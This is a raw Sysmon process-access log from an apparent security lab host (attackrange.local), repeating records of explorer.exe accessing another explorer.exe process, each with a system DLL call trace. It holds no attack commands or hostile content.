16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 